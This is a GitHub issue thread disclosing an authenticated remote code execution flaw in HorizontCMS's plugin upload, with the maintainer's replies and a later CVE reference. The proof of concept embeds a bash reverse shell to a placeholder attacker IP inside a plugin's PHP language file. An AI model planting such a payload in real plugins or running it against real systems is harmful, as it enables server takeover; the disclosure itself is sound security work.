Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Authenticated Remote Code Execution via a Malicious Plugin Upload #29

Open
bigb0sss opened this issue Mar 14, 2021 · 4 comments
Open

Authenticated Remote Code Execution via a Malicious Plugin Upload #29

bigb0sss opened this issue Mar 14, 2021 · 4 comments
Assignees
@ttimot24
Labels
security

Comments

@bigb0sss
Copy link

bigb0sss commented Mar 14, 2021
edited
Loading

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.

Reproduction of the Issue

  1. Login to the admin panel (http:///admin/login)
  2. Prepare the malicious plugin file (We used a sample GoogleMaps (https://github.com/ttimot24/GoogleMaps) file and modified the "/resources/lang/en/message.php" to introduce our own PHP code)
<?php 

$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp/<Attacker IP>/9001 0>&1'");

return [
        'successfully_added_location' => $shell, //'Location added succesfully!',
        'successfully_deleted_location' => 'Location deleted succesfully!',
        'successfully_set_center' => 'Location is successfully set as map center!'
];
  1. Zip the GoogleMaps plugin folder and upload it via Plugins functionality in the admin portal.
  2. Install & activate the Plugins
  3. Using "Add location" add an arbitrary location and click "Save" --> When its condition is met for "successfully_added_location," it will run our code ($shell) instead of printing out the original message 'Location added succesfully!'

Screenshots

  • Modifying the message.php file in the sample GoogleMaps plugin file:
    10

  • Zip and upload the GoogleMaps plugin:

$ zip -r google.zip GoogleMaps

11

  • Install --> Activate --> Google Maps Plugin is created in the menu bar:
    12

  • Add location --> Click Save (to initiate the message.php code)
    13
    14

  • Listener Receiving a Reverse Shell
    15

Root Cause

  • The application is taking an arbitrary plugin file and execute the user supplied PHP code without proper sanitization.

Please let us know if you have any questions or need further information. Thanks.

Daniel Min & Chi Tran
@bigb0sss bigb0sss reopened this Mar 15, 2021
@ttimot24 ttimot24 self-assigned this Mar 15, 2021
@bigb0sss
Copy link
Author

Hi @ttimot24,

Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.

@ttimot24
Copy link
Owner

Hi @bigb0sss,

I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.

Feel free to write about it on your blog.

@bigb0sss
Copy link
Author

bigb0sss commented May 5, 2021

Hi @ttimot24,

Hope all is well.

We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?

If so, would you please point us to the updated code?

Please let us know if you have any questions. Thanks!

@bigb0sss
Copy link
Author

bigb0sss commented Apr 6, 2022

Hi @ttimot24,

Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.

All the best,

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@ttimot24 ttimot24

Labels
security
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@ttimot24 @bigb0sss